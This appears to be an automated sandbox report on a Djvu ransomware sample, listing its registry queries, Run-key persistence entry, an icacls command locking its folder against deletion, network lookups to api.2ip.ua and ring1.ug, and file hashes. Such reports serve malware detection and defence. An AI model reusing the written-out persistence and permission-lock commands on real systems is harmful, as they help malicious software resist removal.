
Djvu Ransomware

ransomware djvu

Djvu family

djvu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\starticon3.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7a476725-87dd-470e-896f-17a56effaee5\\starticon3.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\starticon3.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\starticon3.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\starticon3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\starticon3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\starticon3.exe

"C:\Users\Admin\AppData\Local\Temp\starticon3.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\7a476725-87dd-470e-896f-17a56effaee5" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\starticon3.exe

"C:\Users\Admin\AppData\Local\Temp\starticon3.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2144

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 ring1.ug udp
US 8.8.8.8:53 ring1.ug udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 ring1.ug udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 ring1.ug udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/1792-2-0x0000000006E40000-0x0000000006F5A000-memory.dmp

memory/1792-3-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1792-1-0x0000000006C50000-0x0000000006CEA000-memory.dmp

C:\Users\Admin\AppData\Local\7a476725-87dd-470e-896f-17a56effaee5\starticon3.exe

MD5 e8bbb6d921b79101aea7d906a1798f3d
SHA1 4fd59822cdedd1b194d27d2c01a9cde6222de1bb
SHA256 7bc2928ce06e7db7bfe0bf3f2c2d2ff9df7f0a8041ea8c593dd0b912c1c3d3fd
SHA512 c525e07c65c7be43aa90568f98253b397919cd0f597b1ba446fed51a578ca1aae4c93fa59e1345b20e3216a676ba35c89c67d6ced6bea68da44a53989fa4d656

memory/1792-12-0x0000000000400000-0x0000000004F0E000-memory.dmp

memory/1792-15-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1792-14-0x0000000006E40000-0x0000000006F5A000-memory.dmp

memory/1792-13-0x0000000000400000-0x0000000004F0E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 a22f82b327418bd0ea2655bf100c2644
SHA1 2a4eb460fd63004182c3d3fdace7f9956d00c332
SHA256 423220863e53f65b235a8a47157c8d614362ac12f4b4d3bc8f7d3e57dc7e25e2
SHA512 2e4995acfebaffdef8f84c0c1049b4a308a21c6a604ea267a4e2cd90ba32f464489195b24abf6a0921419c2c09496a9dd94e7136ed7e03036f60cb2d45201ea4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 bf3fceab2c002dae29619a697cd28f30
SHA1 dbf6755f5e997f9cf9c490f1df09cc5f99df54ef
SHA256 55dbe515022ba8cc47b3d2ae70548e85e1cc4b2e73e71e64a716c9bb8ef16b3c
SHA512 42624112b91e496c619335e9a9db3bdbba8ddc3a9078d46a86d3a11ab2a655f8eb0fad947c367b95a1fb0153f9725e72fcc8d462616af2774d6350c7f3db4281

memory/4432-21-0x0000000000400000-0x0000000004F0E000-memory.dmp

memory/4432-22-0x0000000000400000-0x0000000004F0E000-memory.dmp

memory/4432-24-0x0000000000400000-0x0000000004F0E000-memory.dmp

memory/4432-26-0x0000000000400000-0x0000000004F0E000-memory.dmp